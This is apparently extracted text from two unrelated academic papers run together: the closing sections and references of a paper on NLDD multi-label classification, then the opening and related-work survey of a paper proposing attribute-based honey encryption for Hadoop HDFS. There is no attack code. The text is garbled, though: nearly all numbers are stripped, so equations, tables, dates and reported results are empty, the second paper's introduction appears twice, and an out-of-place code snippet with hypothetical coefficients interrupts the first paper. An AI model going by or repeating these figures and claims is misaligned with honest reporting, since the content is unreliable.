loss (or, equivalently the probability of misclassification for each label) decreases as dx or dy decreases. from the values of β̂ we may infer how low the expected loss is when either dx or dy is . for example, β̂ =− . in the scene data set. if dx = and dy = , p̂= . because log p̂ −p̂ =− . . hence ê(loss)=lp̂= · . = . . this is the expected number of mismatched labels for choosing a training labelset whose distances to the new instance are zero in both feature and label spaces. the results suggest the expected loss would be very small when classifying a new instance that had a duplicate in the training data (dx= ) and whose labels are predicted with probability and the predicted labelset was observed in the training data (dy= ). 
gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the maximum likelihood estimates of the parameters of equation ( ) averaged over cross validations. data β̂ β̂ β̂ emotions − . . . scene − . . . yeast − . . . medical − . . . slashdot − . . . enron − . . . bibtex − . . . ohsumed − . . . tmc − . . . scaling up nldd as seen in ‘nearest labelset using double distances (nldd)’, the time complexity of nldd is dependent on the size of the training data (n). in particular, the term o(n (d+l)) makes the complexity of nldd quadratic in n . for larger data sets the running time could be reduced by running the algorithm on a fraction of the n instances, but performance may be affected. this is investigated next. figure illustrates the running time and the corresponding performance of nldd as a function of the percentage of n . for the result, we used the tmc data with / train/test splits. after splitting, we randomly chose %– % of the training data and ran nldd with the reduced data. as before, we used svm with a linear kernel as the base classifier. the result shows that nldd can obtain similar predictive performances for considerably less time. the running time increased quadratically as a function of n while the improvement of the performance of nldd appeared to converge. using % of the training data, nldd achieved almost the same performance in the number of mismatched labels as using the full training data. similar results were obtained on other large data sets. discussion for the sample data sets selected, nldd achieved the lowest (i.e., best) average ranks on / loss and multi-label accuracy, and the second lowest average ranks on hamming loss and f-measure compared with other state-of-art methods. what may explain the success of nldd? nldd minimizes a function of two distances. nldd performs substantially better than separate approaches that rely on only one of the distances: k-nearest neighbors (k= ) using dx only or smbr using dy only (supplemental information). nldd integrates the two distances using an additive model eq. ( ). the specific integration does not appear crucial: we have experimented with a multiplicative model, log ( θ −θ ) =β +d β x d β y , that performed similarly (results not shown). therefore the success seems due to the combination of two quite different distances. the distances may be complementary in that dx corresponds to a highly local classifier (knn with k= ) gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. a percentage of instance space (n) t im e ( se co n d s) . . . . . b percentage of instance space (n) n u m b e r o f m is cl a ss ifi e d la b e ls figure running time (a) and the average number of mismatched labels (b) as a function of the percentage of the instance space for nldd. full-size doi: . /peerjcs. /fig- and dy draws on a global classifier. computing the distance dy requires estimating the probability of each label using a base classifier. the classifier used here, svm, is a general global classifier. some evidence for the conjecture that a global base classifier is important are experiments using nearest neighbors (knn) instead of svm as a base classifier: a more global choice (k = ) yielded much improved results over a more local choice (k = ) (supplemental information). 
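the calculation just described can be made concrete with a short worked example. the coefficient values below are made up purely for illustration (the paper's fitted values are reported in the table that follows); only the form of the computation follows eq. (2) and eq. (3).

```python
import math

beta0, beta1, beta2 = -4.0, 1.5, 3.0   # hypothetical mles for one data set
L = 6                                   # number of labels, hypothetical

def theta_hat(d_x, d_y):
    """estimated per-label misclassification probability from eq. (2)."""
    f = beta0 + beta1 * d_x + beta2 * d_y
    return 1.0 / (1.0 + math.exp(-f))

# a 'double-duplicate' test instance: both distances are zero
print(theta_hat(0.0, 0.0))        # 1/(1 + e^4) ~= 0.018, small but nonzero
print(L * theta_hat(0.0, 0.0))    # expected number of mismatched labels ~= 0.11

# candidate training labelsets are ranked by L * theta_hat, i.e. by the
# weighted sum beta1*d_x + beta2*d_y of eq. (3)
candidates = [(0.4, 0.10), (0.2, 0.30), (1.0, 0.05)]   # (d_x, d_y) pairs
best = min(candidates, key=lambda d: beta1 * d[0] + beta2 * d[1])
print(best)   # (0.4, 0.10): weighted sum 0.9 beats 1.2 and 1.65
```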
like br, nldd uses outputs of independent binary classifiers. using the distances in the feature and label spaces in binomial regression, nldd can make more accurate predictions than br. nldd was also significantly superior to smbr, which is similar to nldd in the sense that it makes predictions by choosing training labelsets using binary classifiers. one of the reasons why nldd performs better than br and smbr is that it contains extra parameters. smbr is based on the label space only, while nldd uses the distances in the feature space as well. like lp, the proposed method predicts only labelsets observed in the training data. in restricting the labelsets for prediction, higher order correlations among the labels are implicitly accounted for. at the same time, this restriction is nldd’s main limitation. if a new instance has a true labelset unobserved in the training data, there will be at least one incorrectly predicted label. even so, nldd scored best on two metrics and second best on two other metrics. how frequently an unobserved labelset occurs depends on the data set. for most data sets, less than % of the test data contained labelsets not observed in the training data. in other words, most of the labelsets of the test instances could be found in gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. the training data. however, for the bibtex data set about % of the test data contained unobserved labelsets. as seen in table , when the true labelsets of the test instances were not observed in the training data (subset b), br performed slightly better than nldd in terms of / loss, multi-label accuracy and f-measure. on the other hand, when the true labelsets of the test instances were observed in the training data (subset a), nldd outperformed br on all of the metrics. combined, nldd achieved higher performances than br on the entire test data. however, nldd might not fare as well when the percentage of unobserved labelsets is substantially greater. the use of binomial regression (see equation eq. ( )) implies that the misclassification probability θ is constant for each label. although the true misclassification probabilities may differ for labels, the experimental results showed that nldd performs well under this assumption. instead of using binomial regression and estimating a single constant θ, one might have used l logistic regressions to estimate individual θi (i= ,...,l) for each label. rather than choosing the labelset that minimizes a single θ, one could have then chosen the labelset that minimizes a function of the θi. however, choosing such a function is not straightforward. also, this requires estimating l parameters instead of . nldd uses binomial regression to estimate the parameters. this setup assumes that the instances in s are independent. while it turned out that this assumption worked well in practice, dependencies may arise between the two pairs of a given si. if required this dependency could be modeled using, for example, generalized estimating equations (gee) (liang & zeger, ). we examined gee using an exchangeable correlation structure. the estimates were almost the same and the prediction results were unchanged. the analogous results are not shown. nldd has higher time complexity than br. the relative differences of running time between nldd and br depended on the size of the training data (n). 
the number of labels and features had less impact on the differences, as the complexity of nldd is linear in them.

for prediction, the minimization in eq. ( ) only requires the estimates of the coefficients β₁ and β₂, which determine the tradeoff between dx and dy; the estimate of β₀ is not needed. however, estimating β₀ allows us to also estimate the probability of a misclassification of a label for an instance, θ̂. such an assessment of the uncertainty of the prediction can be useful: for example, one might only want to classify instances where the probability of misclassification is below a certain threshold value.

nldd uses a linear model for the binomial regression specified in eq. ( ). to investigate how the performance of nldd changes with nonlinear models, we also considered a model, log(θ/(1−θ)) = β₀ + dx^β₁ · dy^β₂, in which the distances are combined in a multiplicative way. the difference between the prediction results obtained by the linear and multiplicative models was small. while we used the euclidean distance for nldd, other distance metrics such as the manhattan distance may also be employed. we ran nldd based on the manhattan distance in the label space and the results were almost the same: over % of the predictions were identical and the differences in performance on all metrics were less than % (the euclidean distance gave slightly better performance for most data). this shows that the difference in prediction performance between the manhattan and the euclidean metrics was tiny in practice.

while svm was employed as the base classifier, other algorithms could be chosen provided the classifier can estimate posterior probabilities rather than just scores. better predictions by the binary classifiers will make the distances in the label space more useful and hence lead to better performance. lastly, we observed that the distributions of labels are, in general, unbalanced for many multi-label data sets. since the performance of traditional classification algorithms can be limited on unbalanced data, addressing this problem could improve the reliability of the probabilistic classifiers and result in improved performance of nldd. to mitigate the unbalanced distributions of labels, we applied the synthetic minority over-sampling technique (smote) (chawla et al., ), which evens out the class distribution by generating synthetic examples of the minority class. probabilistic classifiers were then trained on the expanded training data and used in the process of nldd. for out of the data sets, the / loss, multi-label accuracy and f-measure were improved by a modest amount.

conclusion

in this article, we have presented nldd, based on probabilistic binary classifiers. the proposed method chooses a training labelset with the minimum expected loss, where the expected loss is a function of two variables: the distances in the feature and label spaces. the parameters are estimated by maximum likelihood. the experimental study with nine different multi-label data sets showed that nldd outperformed other state-of-the-art methods on average in terms of / loss and multi-label accuracy.

additional information and declarations

funding
this research was supported by the national science and engineering research council of canada and by the social sciences and humanities research council of canada (sshrc # - - ). there was no additional external funding received for this study.
the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
national science and engineering research council of canada.
social sciences and humanities research council of canada: sshrc # - - .

competing interests
the authors declare there are no competing interests.

author contributions
• hyukjun gweon conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• matthias schonlau conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, and approved the final draft.
• stefan h. steiner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability:
raw data is available at github: https://github.com/hgweon/hg-multilabel.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
blockeel h, raedt l, ramon j. . top-down induction of clustering trees. in: proceedings of the th international conference on machine learning. – .
boutell mr, luo j, shen x, brown cm. . learning multi-label scene classification. pattern recognition ( ): – .
chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research ( ): – .
demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research : – .
elisseeff a, weston j. . a kernel method for multi-labelled classification. in: advances in neural information processing systems. cambridge: mit press, – .
godbole s, sarawagi s. . discriminative methods for multi-labeled classification. in: dai h, srikant r, zhang c, eds. advances in knowledge discovery and data mining. berlin, heidelberg: springer, – .
gonçalves t, quaresma p. . a preliminary approach to the multilabel classification problem of portuguese juridical documents. in: proceedings of the th portuguese conference on artificial intelligence. springer, – .
hersh w, buckley c, leone tj, hickam d. . ohsumed: an interactive retrieval evaluation and new large test collection for research. in: proceedings of the th annual international acm-sigir conference on research and development in information retrieval. london, – .
hochberg y. . a sharper bonferroni procedure for multiple tests of significance. biometrika ( ): – .
ji s, tang l, yu s, ye j. .
extracting shared subspace for multi-label classification. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. acm, – .
katakis i, tsoumakas g, vlahavas i. . multilabel text classification for automated tag suggestion. in: proceedings of the ecml/pkdd discovery challenge. antwerp.
klimt b, yang y. . the enron corpus: a new dataset for email classification research. in: proceedings of the th european conference on machine learning. pisa: springer, – .
kocev d, vens c, struyf j, džeroski s. . ensembles of multi-objective decision trees. in: proceedings of the th european conference on machine learning. – .
li c, wang b, pavlu v, aslam ja. . conditional bernoulli mixtures for multi-label classification. in: proceedings of the rd international conference on machine learning. new york, – .
li t, ogihara m. . detecting emotion in music. in: proceedings of the international symposium on music information retrieval. – .
liang k-y, zeger sl. . longitudinal data analysis using generalized linear models. biometrika ( ): – .
liu f, zhang x, ye y, zhao y, li y. . mlrf: multi-label classification through random forest with label-set partition. in: proceedings of the th international conference on intelligent computing. springer, – .
madjarov g, kocev d, gjorgjevikj d, džeroski s. . an extensive experimental comparison of methods for multi-label learning. pattern recognition ( ): – .
meyer d, dimitriadou e, hornik k, weingessel a, leisch f. . e : misc functions of the department of statistics, tu wien. available at http://cran.r-project.org/package=e .
platt j. . probabilistic outputs for support vector machines and comparisons to regularized likelihood methods. in: smola a, bartlett p, schoelkopf b, schuurmans d, eds. advances in large margin classifiers. cambridge: mit press, – .
r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/.
read j, pfahringer b, holmes g. . multi-label classification using ensembles of pruned sets. in: proceedings of the th ieee international conference on data mining. – .
read j, pfahringer b, holmes g, frank e. . classifier chains for multi-label classification. machine learning ( ): – .
schapire re, singer y. . improved boosting algorithms using confidence-rated predictions. machine learning ( ): – .
schapire re, singer y. . boostexter: a boosting-based system for text categorization. machine learning ( ): – .
srivastava a, zane-ulman b. . discovering recurring anomalies in text reports regarding complex space systems. in: proceedings of the ieee aerospace conference. – .
tai f, lin h-t. . multilabel classification with principal label space transformation. neural computation ( ): – .
trohidis k, tsoumakas g, kalliris g, vlahavas i. . multilabel classification of music into emotions.
in: proceedings of the th international conference on music information retrieval. philadelphia, – .
tsoumakas g, katakis i. . multi-label classification: an overview. international journal of data warehousing and mining : – .
tsoumakas g, katakis i, vlahavas i. . effective and efficient multilabel classification in domains with large number of labels. in: proceedings of the ecml/pkdd workshop on mining multidimensional data. – .
tsoumakas g, katakis i, vlahavas i. . mining multi-label data. in: maimon o, rokach l, eds. data mining and knowledge discovery handbook. boston: springer, – .
tsoumakas g, katakis i, vlahavas i. . random k-labelsets for multilabel classification. ieee transactions on knowledge and data engineering ( ): – .
tsoumakas g, vlahavas i. . random k-labelsets: an ensemble method for multilabel classification. in: proceedings of the th european conference on machine learning. berlin: springer, – .
vapnik vn. . the nature of statistical learning theory. nd edition. new york: springer.
wilcoxon f. . individual comparisons by ranking methods. biometrics bulletin ( ): – .
ypma tj. . historical development of the newton-raphson method. siam review ( ): – .
zhang m-l, zhou z-h. . a k-nearest neighbor based algorithm for multi-label classification. in: proceedings of the st ieee international conference on granular computing, vol. . – .
zhang m-l, zhou z-h. . ml-knn: a lazy learning approach to multi-label learning. pattern recognition ( ): – .
zhang ml, zhou zh. . a review on multi-label learning algorithms. ieee transactions on knowledge and data engineering ( ): – .

submitted may
accepted january
published february
corresponding authors: gayatri kapil, gayatri @gmail.com; rajeev kumar, rs @gmail.com
academic editor: shlomi dolev
additional information and declarations can be found on page
doi . /peerj-cs.
copyright kapil et al.
distributed under creative commons cc-by .
open access

attribute based honey encryption algorithm for securing big data: hadoop distributed file system perspective

gayatri kapil, alka agrawal, abdulaziz attaallah, abdullah algarni, rajeev kumar and raees ahmad khan
information technology, babasaheb bhimrao ambedkar university, lucknow, uttar pradesh, india
faculty of computing and information technology, king abdulaziz university, jeddah, saudi arabia

abstract

hadoop has become a promising platform to reliably process and store big data. it provides flexible and low cost services for huge data through hadoop distributed file system (hdfs) storage. unfortunately, the absence of any inherent security mechanism in hadoop increases the possibility of malicious attacks on the data processed or stored through hadoop. in this scenario, securing the data stored in hdfs becomes a challenging task. hence, researchers and practitioners have intensified their efforts in working on mechanisms that would protect users' information collated in hdfs. this has led to the development of numerous encryption-decryption algorithms, but their performance decreases as the file size increases.
in the present study, the authors present a methodology to solve the issue of data security in hadoop storage. the authors have integrated attribute based encryption with honey encryption on hadoop, i.e., attribute based honey encryption (abhe). this approach works on files that are encrypted inside hdfs and decrypted inside the mapper. in addition, the authors have evaluated the proposed abhe algorithm by performing encryption-decryption on files of different sizes and have compared it with existing algorithms including aes and aes with otp. the abhe algorithm shows a considerable improvement in performance during the encryption-decryption of files.

subjects: cryptography, security and privacy
keywords: big data, data security, encryption-decryption, hdfs, hadoop, cloud storage

introduction

data security has now become one of the topmost concerns for any individual or organization. day by day, a substantial amount of information is transferred through digital applications, which requires a great deal of extra storage space, processing resources and dynamic framework execution. the exponential use of smartphones, social networking sites, downloaded apps and web sensors generates a huge amount of data. this has led to several issues in big data including storage customization, security, cost-effectiveness, smooth performance, vendor lock-in, and compliance. all these issues are important in hadoop. however, big data security and privacy has become the burning issue for hadoop hdfs data storage and distributed computing. this study essentially focuses on ensuring security and privacy for big data at the storage level.

how to cite this article: kapil g, agrawal a, attaallah a, algarni a, kumar r, khan ra. . attribute based honey encryption algorithm for securing big data: hadoop distributed file system perspective. peerj comput. sci. :e http://doi.org/ . /peerj-cs.

when utilizing the hadoop hdfs data storage service, clients have no compelling reason to store information locally and carry it around constantly. as is the usual norm, the information is kept on the hadoop hdfs storage server to ensure that clients can access it as per their convenience, irrespective of the time and place they choose to avail it from. the hadoop hdfs storage server provides both hardware allocation and information security assurance. as long as the clients are connected to the internet, they can get their information easily. hadoop is an ongoing innovation which is utilized as a framework for huge information storage. it is an open source implementation of the framework based on java. hadoop is utilized in a substantial cluster or as a public cloud service; this process is termed the standard distributed parallel processing framework (polato et al., ). the versatility of hadoop is evident from its ubiquitous use, yet hadoop is devoid of effective mechanisms to ward off security breaches of the data stored in hdfs. as hadoop provides no inherent security for the information stored in it, numerous methods and approaches for securing the stored hdfs files have been explored by various researchers and practitioners. among all these efforts, encryption seems to be the most promising answer for securing information in hdfs that is kept in datanodes, as well as for securely exchanging data from one datanode to another while executing mapreduce jobs. encryption techniques can considerably reduce the security breaches and data infringement in a hadoop environment. however, the results obtained through various encryption algorithms have demonstrated that the sizes of the original files can be extended to about one and a half times. further, the uploading as well as the downloading time of a given file can also be increased. hence, to address these concerns, the researchers of this study have proposed a new encryption-decryption algorithm, i.e., abhe. as per the simulation results, this technique has shown marked improvements in encryption-decryption time in comparison with the already available algorithms including the advanced encryption standard (aes) and aes with otp (mahmoud, hegazy & khafagy, ). the main contributions of the paper are:
• an in-depth study of the big data processor hadoop and an assessment of its strengths and weaknesses in terms of security and privacy;
• the proposal of abhe, a secure and efficient algorithm executed on single and two datanodes in hadoop, which is also intended to provide security against side channel attacks, brute force attacks and collusion attacks;
• experiments on test data to demonstrate the efficacy of the proposed abhe approach versus other secure approaches, i.e., aes and aes-otp;
• the evaluation of the performance of the proposed abhe in terms of file size, encryption time, decryption time, throughput and power consumption;
• results showing that abhe improves the execution time (the total time taken for encryption and decryption of data) without affecting the size of the original file.

the rest of the paper is divided into the following sections:
• section - enlists the pertinent research done in the domain of big data storage;
among all these efforts, encryption seems to be the most promising answer for securing information in hdfs that is kept in datanodes as well as for securely exchanging datafrom one datanode to another datanode while executing mapreduce jobs. encryption techniques can considerably reduce the security breaches and data infringement in hadoop environment. however, the results obtained through various encryption algorithms have demonstrated that the document sizes of the original files can be extended to about one and a half. further, the uploading as well as the downloading time of a given file can also be increased. hence, to adress these concerns, the researchers of this study have propositioned a new encryption-decryption algorithm, i.e., the abhe. as per the simulation results, this technique has shown marked improvements over encryption-decryption time in comparison with the already available algorithms including the advanced encryption standard (aes) and aes with otp (mahmoud, hegazy & khafagy, ). the main contributions of paper are: • to carry out the in-depth study of big data processor, i.e., hadoop and to assess its strength and weakness in terms of security and privacy; • to propose an abhe, a secure and efficient algorithm executed on single and two datanodes in hadoop. also, it ensures the full security against all side channel attacks, brute force attack and collusion attack; • to conduct experiments on test data to prove the efficacy of our proposed approach abhe vs. other secure approches i.e., aes and aes-otp; • the performance of proposed abhe has been calculated in terms of file size, encryption time, decryption time, throughput and power consumption; • the result shows that abhe improves the execution time (total time taken for encryption and decryption of data) without affecting the size of original file. the rest of the paper has been divided into the following sections: • section - enlists the pertinent research done in the domain of big data storage; kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • section - enunciates the suggested data encryption algorithm formulated on abhe; • section - presents the integration of the suggested algorithm with hadoop environment. furthermore, this section also provides a comparison between the efficacy of the suggested encryption approach vis-a-vis the two already available encryption algorithms namely; aes and aes with otp with different sizes of text files ranging from mbs to gbs ( mb, mb, mb, and gb); • section - underlines the significance of this research study; • section - concludes the study. related work hadoop security hadoop was created in with the intention to manage only huge amount of data confined to a specific condition. thus, security issues weren’t the topmost preference (yalla et al., ). for any data storage, hadoop employs the user’s name. in the default node, there is no encryption among hadoop, the client host as well as the hdfs. all the records are feeded into and constrained by a central server which is known as namenode. thus, hdfs lacks in security system against capacity servers. hence, all information stored in this process is prone to be breached. besides, a strong security model is also lacking between hadoop and hdfs. the correspondence among datanodes and among the end users and datanodes remains encoded. it has no validation of clients or administration. 
even after yahoo concentrated on including authentications in , hadoop still had constrained approved abilities (yalla et al., ). in , the apache software foundation defined venture rhino to include security highlights (yalla et al., ). hadoop has the facility of data management that is scalable, rich in features and cost-effective for the masses. it has been a data platform of storing secret information for many organizations. the data stored in slots is saved but once it is brought together and made accessible for organizations over the masses, new security challenges arise. big data in a hadoop contains sensitive information related to financial data, corporate information, personal information and many such confidential data of clients, customers and employees. hence, optimum protection of such data and ensuring that it remains free from any encroachment or tampering is of utmost significance (rerzi, terzi & sagiroglu, ; mehmood, natgunanathan & xiang, ; bardi et al., ; scrinivasan & revthy, ; derbeko et al., ; gupta, patwa & sandhu, ). big data: hadoop security solutions to elucidate the mentioned problems, a few activities have been appended to hadoop to keep up with the equivalent (vormetric data security, ; jam, akbari & khanli, ): perimeter security: network security firewalls, apache knox gateway authentication: kerberos authorization: e.g. hdfs permissions, hdfs acl s, mr acls data protection: encryption at rest and encryption in motion. to provide security for data in hdfs, few available mechanisms are: kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. authentication authentication implies user’s identification. authenticators are answerable for gathering testimonials by the api (application programming interface) consumers, authenticating them and publicizing the success or failure status to the clients or chain providers. because of this primary check, uncertain users won’t be able to access the cluster network and trusted network. identification is regulated by the client host. for strong authentication, hadoop uses kerberos (vormetric data security, ; jam, akbari & khanli, ), and ldap (lightweight directory access), ad (active directory) integrated with kerberos, establishing a single point of truth. kerberos is a computer grid authentication protocol which generates ‘‘tickets’’ to allow the nodes communicating over an unprotected network to prove their identity to one another. the reliable server authentication key is placed in each node of the array to achieve authenticity of the hadoop cluster node communication which will develop the hdfs array. it can effectively prevent non-trusted machines posing as internal nodes registered to the namenode and then process data on hdfs. these components are used throughout the cluster. hence, from the storage point of view, the legitimacy of the nodes in hdfs cluster could be guaranteed by kerberos. it is completely entrusted by hadoop for authentication between the client and server. hadoop . . version includes the kerberos mechanism. client requests an encrypted token of the authentication agent. a particular service can be requested from the server by using this. password guessing attacks remains inoperative in kerberos and thus multipart authentication is not provided (zettaset, ). authorization authorization or restrict access is the method of securing the access within the data by the users as per the corporate policies or service provider. 
an authorization provider may also use acl (access control list) based authorization, as in the knox gateway (vormetric data security, ; jam, akbari & khanli, ), which is based on the evaluation of rules comprising usernames, groups and ip (internet protocol) addresses. the aim of hadoop's developers is to design an authorization plan for the hadoop platform that manages the authorization structure for hadoop components.

data protection

data protection is the process of protecting data at rest (in storage) and during transmission with the help of encryption and masking (vormetric data security, ; jam, akbari & khanli, ). encryption acts as an added layer of security in which data is made unreadable during transmission or at rest. hadoop employs the existing capabilities of data protection by providing solutions for data at rest and for data discovery and masking. however, hadoop's security still needs improvement. the work already done by researchers and practitioners on hadoop is highly commendable; several research studies have focused on techniques to improve the security of data at rest as well as during transmission. some of the relevant approaches are discussed below.

achieving secure, scalable and fine-grained data access control. this work combines techniques of attribute-based encryption (abe), proxy re-encryption, and lazy re-encryption (yu et al., b). the integrated method accomplishes fine-grainedness, scalability, and data confidentiality during data access control in cloud computing. in this work, data files are encrypted using symmetric deks (symmetric data encryption keys of the data files) and, later, the deks are encrypted with kp-abe (a public key cryptography primitive for one-to-many communications). such a dual encryption technique is called hybrid encryption. the kp-abe technique is used for basic functions like the creation or deletion of files and user revocation with a fine-grained data access control mechanism. user revocation is a big issue in this process and, to achieve it, the authors combined proxy re-encryption with kp-abe and delegated some tedious computational tasks to cloud servers. the cloud server stores secret key components and one dummy attribute corresponding to each user. when the data owner modifies the set of attributes during user revocation, proxy re-encryption keys are generated and transferred to the cloud servers. later, the cloud servers update their secret keys on the basis of the new re-encryption keys and re-encrypt the data files accordingly. due to this, the data owner is free from the computation load during user revocation and does not need to stay online, since the cloud servers take over this task after receiving the re-encryption keys. moreover, the secret key updating and data file re-encryption tasks are merged into a single task using the lazy re-encryption technique, to save computation overhead on the cloud servers during user revocation.

secure data sharing by using a certificate-less proxy re-encryption scheme. this study stated that, by using a public cloud, data can be shared securely. the research work presented a concept wherein a certificate-less proxy re-encryption scheme (cl-pre) is introduced (xu, wu & zhang, ). according to this concept, an identity based public key is added to the proxy re-encryption technique.
this removes the traditional identity-based key escrow problem. the scheme requires no certificates to guarantee the authenticity of the public key, and cl-pre is used to reduce the computation and communication cost for the data owner.

fully homomorphic encryption. this research (jam, akbari & khanli, ) proposed the design of a trusted file system that combines authentication agent technology with fully homomorphic encryption. it is used for hadoop and provides reliability and security across data, hardware, users and operations. this enables the user to prevent data breaches along with enhanced application efficiency, which is possible because the data stays encrypted under homomorphic encryption. authentication agent technology also provides a range of techniques, integrating mechanisms such as privilege separation and security audit, to protect data in the hadoop system. fully homomorphic encryption gives various users the ability to carry out any operation on encrypted data with the same results, provided the data remains in encrypted form throughout the operation. the data remains encrypted when processed with mapreduce and is stored safely in hdfs.

a novel data encryption in hdfs. a new method for encrypting a file while uploading it to hdfs has been proposed in this research work (nguyen et al., ). the upload is performed together with the encryption process before the data is placed on hdfs. in this method (nguyen et al., ), the user selects a file to upload and provides a unique secret key for the encryption of the selected file. with this approach, the user has the same experience as when uploading a normal (unencrypted) file to hdfs, since the encryption is done transparently. also, this method utilises the characteristics of the read/write operation to reduce the total time in hdfs. as an experiment, the authors applied this technique on a mb file and observed that the encrypting upload and decrypting download process is usually . to . times faster than the conventional method. the major drawback of this approach is key management, because the number of keys grows with the number of users and dealing with them is quite challenging. additionally, sharing of encrypted files is not possible with this approach. the proposed approach lags due to these two major issues and needs the dedicated attention of researchers and practitioners.

secure hadoop with encrypted hdfs using aes encryption/decryption. security in the hadoop architecture is proposed in this paper by applying encryption and decryption techniques in hdfs (park & lee, ). in hadoop, this is achieved by adding an aes encrypt/decrypt function to the compression codec. experiments on hadoop showed that the computation overhead is reduced by less than % when a representative mapreduce job is run on encrypted hdfs.

triple encryption scheme for hadoop-based data. cloud computing has the distinctive ability to provide users with customised, adaptable and trustworthy services at feasible costs; hence, more and more users are availing of cloud computing. given the rising demand for cloud applications, the protection of data in cloud storage has become imperative. a method called novel triple encryption has been introduced in this paper (yang, lin & liu, ) to achieve data protection in cloud storage.
the triple encryption approach uses dea (data encryption algorithm) for hdfs file encryption, rsa for the data key encryption and, finally, idea for encrypting the user's rsa private key. in this approach, a des and rsa based hybrid encryption technique is used to encrypt hdfs files, and idea (international data encryption algorithm) is used to encrypt the rsa based user key. in the hybrid encryption, the des algorithm is used to encrypt the files and produce the data key. this data key is again encrypted using the rsa algorithm to provide additional security. the data key can be decrypted using the private key only; therefore, it always stays with the user. this method uses both symmetric and asymmetric encryption techniques and is thus called hybrid encryption. the approach has been tested and implemented in hadoop based cloud data storage.

attribute-group based data security access. due to various security issues, the development and use of cloud storage has decreased. to gain the confidence of users, the authors defined an attribute-group based data security access scheme to protect the data during network transfer and data sharing in cloud storage services. in this scheme (zhou & wen, ), the data owner has limited user rights, and re-encryption on the data node reduces the computational cost along with the management of the clients. it also reduces the complexity of property and rights management. the authors also use the ciphertext-policy cp-abe encryption algorithm to secure the data in cloud storage. the centralised management of key distribution and the namenode based cp-abe algorithm have advantages such as more transparency for the user and easier management of the user key, as compared to the data owner key distribution technique.

towards a trusted hdfs storage platform. the mechanism for the protection of a hadoop infrastructure is explained in this research (cohen & acharya, ), dealing with the concept of creating a reliable hdfs and its safety hazards. the researchers also examine the relation between security mechanisms and their effect on performance (cohen & acharya, ). the authors implemented trusted computing concepts on hadoop considering a threat based environment. the framework is based on the trusted platform module (tpm) and implemented into a base environment. furthermore, the authors utilized a hardware key protection encryption scheme for hadoop and aes-ni for accelerating the encryption, and compared results after implementation. in addition, the authors claimed a % overhead reduction on encryption and a % overhead reduction on decryption in an experiment on simulated mb block data with the aes-ni instructions. this approach provides a concrete layered security design in hadoop.

security framework in g-hadoop. an approach has been introduced where hadoop's mapreduce tasks run simultaneously on multiple clusters in a grid environment called g-hadoop (jam, akbari & khanli, ; zhao et al., ). g-hadoop reuses the user authentication and job submission mechanism of hadoop in a grid environment. initially, however, hadoop's user authentication and job submission mechanism was designed for a single cluster in a non-grid environment; therefore, g-hadoop is an extended version of hadoop mapreduce. it establishes a secure link between the user and the target cluster by following the secure shell protocol.
a single dedicated connection is allotted to each participating user in a cluster, and each user has to log on only to those clusters for which they are authenticated. unlike hadoop, a new security framework had to be designed for g-hadoop with various security solutions like public key cryptography and the globus security infrastructure. concepts of proxy identity, user interface and user instance are embedded in this security framework to provide better functionality in a grid environment (jam, akbari & khanli, ; zhao et al., ). this security framework introduced a single sign-on approach for the user authentication and job submission process of g-hadoop. also, this security approach protects the g-hadoop system in a threat environment, i.e., against traditional attacks, abuse and misuse. the model of the security framework is based on the globus security infrastructure (gsi). the utilization of the ssl protocol for communication between the master node and the ca (certification authority) is also a key factor in its security. gsi is based on a single sign-on process and uses asymmetric cryptography to provide secure communication. gsi is a standard grid security infrastructure which adapts various techniques to provide the necessary requirements in a grid environment, including authentication, integrity of the messages and delegation of authority from one entity to another. the user can log in to the master node only after providing authentication in the form of a user name and password, and can then submit jobs to the cluster. ssl handshaking is used in the security framework to establish a secure connection between a datanode and a namenode.

elliptic curve cryptography based security scheme for hadoop distributed file system. this paper (jeong & kim, ) introduces a token based authentication scheme to protect hdfs stored data from security threats like breaches and impersonation attacks. in this scheme, hdfs client authentication is done by the datanode through a block access token and functions as an extra layer of security along with the existing symmetric key hdfs authentication. also, an ecc encryption method is used for the authentication of anonymous keys and provides protection against external threats like security breaches or accidental exposures. the scheme adopts a hash chain of keys approach instead of a public key exchange approach, which is the very common hdfs authentication protocol. apart from providing protection to sensitive hdfs data, it also improves performance as compared to the public key-based hdfs authentication protocols.

secure multi sharing in big data storage. a method of privacy preserving security using different mechanisms, i.e., anonymity, multiple receivers and conditional sharing, is explained in this paper (maheswari, revathy & tamilarasi, ). in this approach, to obtain maximum security, the advanced encryption standard (aes) with message digest (md ) and the data encryption standard (des) are employed to encrypt the data, and authentication of the data is done using dsa. also, security and privacy preserving approaches are used for big data processing in the proposed framework. in this approach, the owner uploads the data to cloud storage and, after encryption, the data is stored in hdfs. thereafter, the data is shared among the multiple receivers.
cipher text is used to hide the identity of the sender and receiver, whereas an anonymization mechanism is used to hide information about a particular receiver. a mechanism based on the user and their received data category, called conditional sharing, starts working after receiving the receiver's details: if the user's category matches the receiver's data category, then the receiver is authenticated and the transmission is started. once the conditional sharing is complete, the receiver retrieves the cipher text. the big data is shared with the cloud only if the result is secure. this proposed algorithm is verified for small data sets only.

